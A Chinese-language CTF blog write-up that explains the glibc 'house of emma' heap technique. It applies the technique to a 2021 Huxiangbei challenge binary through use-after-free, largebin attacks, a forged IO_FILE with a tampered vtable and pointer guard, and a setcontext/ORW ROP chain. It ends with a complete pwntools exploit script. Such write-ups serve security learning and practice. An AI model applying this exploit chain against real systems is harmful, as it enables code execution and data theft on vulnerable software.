house-of-emma学习以及复现

字数统计: 2.5k字   |   阅读时长≈ 13分

house of emma

参考: 桥下少年
emma也是利用house of kiwi的触发assert机制,
house of kiwi是去走的fflush-->__sync__
house of emma 是走的 fxprintf --> __locked_vfxprinf --> __vfprintf_internal --> _IO_default_xsputn
通过修改_IO_file_jumps_IO_cookie_jumps+offset,使得最后+偏移为_IO_cookie_write
然后在_IO_cookie_write中会直接调用指针,设置好偏移就可以去控制执行流

1、assert去触发调用IO_file_jumps调用函数的利用

这里的思路还是控制vtable去执行我们想要的地方
虽然存在vtable_check,不过可以在他规定范围去修改,这里利用的就是_IO_cookie_jumps

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {
  JUMP_INIT_DUMMY,
  JUMP_INIT(finish, _IO_file_finish),
  JUMP_INIT(overflow, _IO_file_overflow),
  JUMP_INIT(underflow, _IO_file_underflow),
  JUMP_INIT(uflow, _IO_default_uflow),
  JUMP_INIT(pbackfail, _IO_default_pbackfail),
  JUMP_INIT(xsputn, _IO_file_xsputn),
  JUMP_INIT(xsgetn, _IO_default_xsgetn),
  JUMP_INIT(seekoff, _IO_cookie_seekoff),
  JUMP_INIT(seekpos, _IO_default_seekpos),
  JUMP_INIT(setbuf, _IO_file_setbuf),
  JUMP_INIT(sync, _IO_file_sync),
  JUMP_INIT(doallocate, _IO_file_doallocate),
  JUMP_INIT(read, _IO_cookie_read),
  JUMP_INIT(write, _IO_cookie_write),
  JUMP_INIT(seek, _IO_cookie_seek),
  JUMP_INIT(close, _IO_cookie_close),
  JUMP_INIT(stat, _IO_default_stat),
  JUMP_INIT(showmanyc, _IO_default_showmanyc),
  JUMP_INIT(imbue, _IO_default_imbue),
};

里面存在的_IO_cookie_read、_IO_cookie_write、_IO_cookie_seek、_IO_cookie_close

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
static ssize_t
_IO_cookie_read (FILE *fp, void *buf, ssize_t size)			// read
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (read_cb);
#endif

  if (read_cb == NULL)
    return -1;

  return read_cb (cfile->__cookie, buf, size);
}

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)	// write
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (write_cb);
#endif

  if (write_cb == NULL)
    {
      fp->_flags |= _IO_ERR_SEEN;
      return 0;
    }

  ssize_t n = write_cb (cfile->__cookie, buf, size);
  if (n < size)
    fp->_flags |= _IO_ERR_SEEN;

  return n;
}

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir)		// seek
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (seek_cb);
#endif

  return ((seek_cb == NULL
       || (seek_cb (cfile->__cookie, &offset, dir)
           == -1)
       || offset == (off64_t) -1)
      ? _IO_pos_BAD : offset);
}

static int
_IO_cookie_close (FILE *fp)								// close
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (close_cb);
#endif

  if (close_cb == NULL)
    return 0;

  return close_cb (cfile->__cookie);
}

这几个函数中都存在直接的函数调用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Special file type for fopencookie function.  */
struct _IO_cookie_file
{
  struct _IO_FILE_plus __fp;
  void *__cookie;
  cookie_io_functions_t __io_functions;
};

typedef struct _IO_cookie_io_functions_t
{
  cookie_read_function_t *read;        /* Read bytes.  */
  cookie_write_function_t *write;    /* Write bytes.  */
  cookie_seek_function_t *seek;        /* Seek/tell file position.  */
  cookie_close_function_t *close;    /* Close file.  */
} c

当然在函数调用前存在一个检测 PTR_DEMANGLE (这里也只是了解)
检测逻辑:将其ROR移位11位后再和指针异或

img

调试过程可以发现,利用的 fs[0x30],可以去修改该处值为我们已知值

img

这里我一直搞不明白的就是这个值在libc_base-0x2890 ,只能记住吗、还是有方法去调试得知

SigreturnFrame()与setcontext

SigreturnFrame()其实也是利用setcontext来实现的,所有在布置setcontext的偏移时可以直接利用SigreturnFrame()来实现

利用思路

1、修改stderr --> _IO_2_1_stderr_
2、修改libc_base - 0x2890为已知值
3、构造IO_FILE ,将vtable修改到对应偏移位置
比如_IO_cookie_jumps + 0x40,去调用__sync时就是到_IO_cookie_write
4、设置好偏移去执行secontext-->orw
5、assert触发IO

2021湖湘杯house of emma

参考 :
House Of Emma | wjh’s blog
Ayakaaaa师傅的博客

IDA:

第一次见这样形式的菜单堆,刚开始就懵了qwq

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  void *s; // [rsp+8h] [rbp-8h]

  sub_16D5(a1, a2, a3);
  while ( 1 )
  {
    puts("Pls input the opcode");
    s = malloc(0x2000uLL);
    memset(s, 0, 0x2000uLL);
    read(0, s, 0x500uLL);
    sub_1289(s);
    free(s);
  }
}

就是输入之间是没用输出的,就直接把要选项参数直接一起输入,然后调用5返回main,然后一直循环

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
__int64 __fastcall sub_1289(__int64 a1)
{
  while ( 1 )
  {
    switch ( *a1 & 0xF )
    {
      case 1:
        add(a1);
        a1 += 4LL;
        puts("Malloc Done");
        break;
      case 2:
        delete(a1);
        a1 += 2LL;
        puts("Del Done");
        break;
      case 3:
        show(a1);
        a1 += 2LL;
        puts("Show Done");
        break;
      case 4:
        edit(a1);
        a1 += *(a1 + 2) + 4LL;
        puts("Edit Done");
        break;
      case 5:
        return 0LL;
...
...

add:限制chunk_size在0x410到0x500之间,且idx小于等于0x10

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
_DWORD *__fastcall sub_149C(__int64 a1)
{
  _DWORD *result; // rax
  unsigned __int8 v2; // [rsp+1Dh] [rbp-13h]
  unsigned __int16 v3; // [rsp+1Eh] [rbp-12h]

  v2 = *(a1 + 1);
  v3 = *(a1 + 2);
  if ( v3 <= 0x40Fu || v3 > 0x500u || v2 > 0x10u )
  {
    puts("ERROR");
    _exit(0);
  }
  chunk_ptr_4040[v2] = calloc(1uLL, v3);
  result = chunk_size_40c0;
  chunk_size_40c0[v2] = v3;
  return result;
}

delete:uaf
show:正常打印
edit:正常修改

思路及过程

有了上文章house of emma的学习这题也就有了大致的思路,
存在uaf,largebin attack挺方便的,先去泄露地址,然后largebin修改stderr、libc_base-0x2890,然后就是布置偏移、伪造IO_FILE,不过实际过程还是有点绕
1、先泄露地址
2、然后利用 largebin attack去修改stderr:
3、利用largebin attack修改libc_base-0x2890:
4、修改top_chunk的size,为触发assert做准备,前几步都比较常规吧、就不粘payload的了
5、伪造IO_FILE:网上师傅可能伪造了_IO_write_ptr等数据,但xshhc师傅分享了这条利用链过程,实际只需要_lock写入一个可写入的地址,_mode也不用限制,最重要的就是修改vtable

1
2
3
4
5
6
7
8
9
10
11
12
13
fake_io = p64(0)
fake_io = fake_io.ljust(0x78, b'\x00')
fake_io += p64(heap_base) 		 # _lock 可写地址
fake_io = fake_io.ljust(0xB0, b'\x00')
fake_io += p64(0)  			# _mode = 0
fake_io = fake_io.ljust(0xC8, b'\x00')
fake_io += p64(iO_cookie_jumps+0x40)  	#vtable

#rdi = stderr 
#_io_cooklie_write --> rdi+0xf0
fake_io += p64(srop_adr)  # 执行gadget_adr时rdi	0xe0
fake_io += p64(0)
fake_io += p64(ROL(gadget_adr ^ (heap_base + 0x2ae0),0x11))	#0xf0

_IO_cookie_jumps + 0x40 + 0x38 –> _IO_cookie_write

img

进入_IO_cookie_write之后 两个重要的地方 (rdi = stderr) 这里可以回溯一下rdi,发现是开始从stderr中赋值来的
rax = rdi+0xf0 (要绕过检测) –> call rax
rdi = rdi + 0xe0

img

所以我们可以控制这两块地址去控制执行流,但怎么利用call去执行orw呢?这里就接触到了一个新知识
思路就是还是去利用setcontext+61–>orw,但setcontext需要rdx,这里去找一个符合的gadget

1
ROPgadget --binary ./libc.so.6 --only "mov|call" | grep "rdx" | grep "rdi"

就是通过我们已经控制的rdi去控制rdx,并可以继续控制执行流的magic_gadget (自己根本找不到qwq)

img

然后去控制rsop_adr+0x8以及srop_adr+0x8+0x20,然后就可以去执行setcontext+61–>orw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pay = p64(0) + p64(srop_adr) 	#rdx=srop_adr
#然后call rdx+0x20 --> sentcontext+61
pay += b'\x00'*0x10 + p64(setcontext_addr+61) #p64(srop_adr+0xf8+0x10) #
#rsp = rdx + 0xa0
pay += bytes(frame).ljust(0xF8, b'\x00')[0x28:]+b'flag'.ljust(0x10, b'\x00')+flat(orw)

debug()

payload = edit(0,fake_io) + edit(1,pay) + add(8,0x450) + p8(5)
io.sendlineafter("Pls input the opcode",payload)
frame = SigreturnFrame()
frame.rdi = srop_adr + 0xf8		#flag
frame.rsi = 0
frame.rdx = 0x100
#frame.r13 = heap_base		#
frame.rsp = srop_adr + 0xF8 + 0x10	# -->orw
frame.rip = ret

开始一直以为网上师傅是有执行rt_sigreturn调试了好久qwq,自己都蒙圈了,最后发这里只是利用这个来布置栈qwq,顺便把open的参数也设置好了

还未解决的小疑惑

因为我写orw一直都是 open、read、write函数来调用,但这题好像不太行

1
2
3
4
orw = flat(pop_rdi,srop_adr+0xf8,pop_rsi,0,op,
pop_rdi,3,pop_rsi,srop_adr+0x200,pop_rdx_rbx,0x100,0,re,
pop_rdi,1,pop_rsi,srop_adr+0x200,pop_rdx_rbx,0x40,0,wr
)

最后还是用的网上师傅的orw,我感觉是没啥区别的 orz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
orw = [
    pop_rax,  # sys_open('flag', 0)
    2,
    syscall,
 
    pop_rax,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi,
    3,
    pop_rsi,
    srop_adr + 0x200,
    syscall,
 
    pop_rax,  # sys_write(1, heap, 0x100)
    1,
    pop_rdi,
    1,
    pop_rsi,
    srop_adr + 0x200,
    syscall
]

img

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
from pwn import *		
context(log_level='debug',os='linux',arch='amd64')
pwnfile = './emma'
io=process(pwnfile)
elf = ELF(pwnfile)					
libc = ELF("./libc.so.6")

def debug():
	gdb.attach(io)
	pause()
def add(idx,size):
	return p8(1) + p8(idx) + p16(size)
def delete(idx):		#uaf
	return p8(2) + p8(idx)
def show(idx):
	return p8(3) + p8(idx)
def edit(idx,content):		#无溢出
	return p8(4) + p8(idx) + p16(len(content)) + content
		
def ROL(content, key):
    tmp = bin(content)[2:].rjust(64, '0')
    print("bin()[2]------------>",bin(content)[2:])	#bin以ob开头
    print("bin()[2]------------>",bin(content)[2:].rjust(64,'0'))
    print("tmp------------>",tmp[key:])
    print("tmp------------>",tmp[:key])
    print("------------>",tmp[key:] + tmp[:key])
    return int(tmp[key:] + tmp[:key], 2)
#libc2.34 保护全开   calloc

#-----------------------------------------------------泄露地址   放入largebin
pay = add(0,0x410)+add(0xa,0x410)+add(1,0x420)
pay += add(2,0x410) + delete(1)
pay += add(3,0x430) + show(1) + p8(5)
io.sendlineafter("Pls input the opcode",pay)

libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-1104-libc.symbols['main_arena']
log.success("libc_base--->"+hex(libc_base))

#debug()
#----------------------------------------------
pay = edit(1,b'a'*0x10) + show(1)+ p8(5)
io.sendlineafter("Pls input the opcode",pay)

io.recvuntil(b'a'*0x10)
heap_base = u64(io.recv(6).ljust(8,b'\x00'))-0x2ae0
log.success("heap_base--->"+hex(heap_base))

#debug()
#----------------------------------------------------------largebin attack 修改stderr
stderr = libc_base + libc.symbols['stderr']	#_IO_2_1_stderr

pay1 = p64(libc_base+0x1f30b0)*2+p64(heap_base+0x2ae0)+p64(stderr-0x20)	#修改
#布置fd、bk、nextsize_fd、nextsize_bk使largebi写入地址为libc_base + 0x22a0
pay2 = p64(libc_base+0x1f30b0)+p64(heap_base + 0x2ae0)*3	#
pay3 = p64(heap_base+0x22a0)+p64(libc_base+0x1f30b0)+p64(heap_base+0x22a0)*2

payload =  delete(0) + edit(1,pay1) + add(4,0x430)		#largebin
payload += edit(1,pay3) + edit(0,pay2) 
payload += add(0,0x410) + add(1,0x420) + p8(5)		#恢复largebin
io.sendlineafter("Pls input the opcode",payload)

#debug()
#--------------------------------largebin attack 修改__pointer_chk_guard	i r fs_base  fs[0x30]
#guard = libc_base + 0x3ee770
guard = libc_base - 0x2890

pay1 = p64(libc_base+0x1f30b0)*2+p64(heap_base + 0x2ae0)+p64(guard-0x20)	#修改
pay2 = p64(libc_base+0x1f30b0)*2+p64(heap_base + 0x2ae0)*2	#恢复

payload = delete(1) + add(4,0x450) + edit(1,pay1)
payload += delete(0) + add(5,0x450) + add(0,0x410)
payload += edit(1,pay2) + add(1,0x420) + p8(5)

io.sendlineafter("Pls input the opcode",payload)

#debug()
#------------------------------------------------------修改top_chunnk

payload = delete(5)
payload += add(6,0x430)
pay = b'a'*0x430+flat(0,0x300)
payload += edit(5,pay) + p8(5)
io.sendlineafter("Pls input the opcode",payload)

#debug()

srop_adr = heap_base + 0x2ae0+0x10
#ROPgadget --binary ./libc.so.6 --only "mov|call" | grep "rdx" | grep "rdi" | grep "rdx"
gadget_adr = libc_base + 0x0146020
setcontext_addr = libc_base + libc.symbols['setcontext']
iO_cookie_jumps = libc_base + libc.symbols['_IO_cookie_jumps']

#伪造跳表
fake_io = p64(0)
fake_io = fake_io.ljust(0x78, b'\x00')
fake_io += p64(heap_base) 		 # _lock 可写地址
fake_io = fake_io.ljust(0xB0, b'\x00')
fake_io += p64(1)  			# _mode = 0
fake_io = fake_io.ljust(0xC8, b'\x00')
fake_io += p64(iO_cookie_jumps+0x40)  	#vtable

#rdi = stderr 
#_io_cooklie_write --> rdi+0xf0
fake_io += p64(srop_adr)  # 执行gadget_adr时rdi	0xe0
fake_io += p64(0)
fake_io += p64(ROL(gadget_adr ^ (heap_base + 0x2ae0),0x11))	#0xf0
#执行gadget --> rdx = rdi+8(stderr+8) --> call rdx+0x20

pop_rdi = libc_base + 0x02daa2
pop_rsi = libc_base + 0x037c0a
pop_rdx_rbx = libc_base + 0x087729
op = libc_base + libc.symbols['open']
re = libc_base + libc.symbols['read']
wr = libc_base + libc.symbols['write']

frame = SigreturnFrame()
frame.rdi = srop_adr + 0xf8		#flag
frame.rsi = 0
frame.rdx = 0x100
#frame.r13 = heap_base		#
frame.rsp = srop_adr + 0xF8 + 0x10	# -->orw
frame.rip = pop_rdi + 1  # ret
'''
orw = flat(pop_rdi,srop_adr+0xf8,pop_rsi,0,op,
pop_rdi,3,pop_rsi,srop_adr+0x200,pop_rdx_rbx,0x100,0,re,
pop_rdi,1,pop_rsi,srop_adr+0x200,pop_rdx_rbx,0x40,0,wr
)
'''
pop_rax = libc_base + 0x446c0
syscall = libc_base + 0x883b6
orw = [
    pop_rax,  # sys_open('flag', 0)
    2,
    syscall,
 
    pop_rax,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi,
    3,
    pop_rsi,
    srop_adr + 0x200,
    syscall,
 
    pop_rax,  # sys_write(1, heap, 0x100)
    1,
    pop_rdi,
    1,
    pop_rsi,
    srop_adr + 0x200,
    syscall
]
#执行gadget_adr  rdx = rdi+8 
pay = p64(0) + p64(srop_adr) 	#rdx=srop_adr
#然后call rdx+0x20 --> sentcontext+61
pay += b'\x00'*0x10 + p64(setcontext_addr+61) #p64(srop_adr+0xf8+0x10) #
#rsp = rdx + 0xa0
pay += bytes(frame).ljust(0xF8, b'\x00')[0x28:]+b'flag'.ljust(0x10, b'\x00')+flat(orw)
#debug()
payload = edit(0,fake_io) + edit(1,pay) + add(8,0x450) + p8(5)
io.sendlineafter("Pls input the opcode",payload)

#io.recvuntil(b'flag')
io.interactive()

IO流程

从__malloc_assert开始

imgimgimgrbx = stderr
imgrdi = rbx+0x88
imgimgimgimg下面图中rbx就是我们伪造的跳表地址img进入_IO_cookie_write后就是rdi+0xf0,当然有 检测img在rdi (chunk0) +8 位置存放 chunk1 地址,然后chunk1+0x20放入setcontext 同时利用frame来布置栈空间,就可以控制程序流了
img

扫一扫,分享到微信

小小pwner,可笑可笑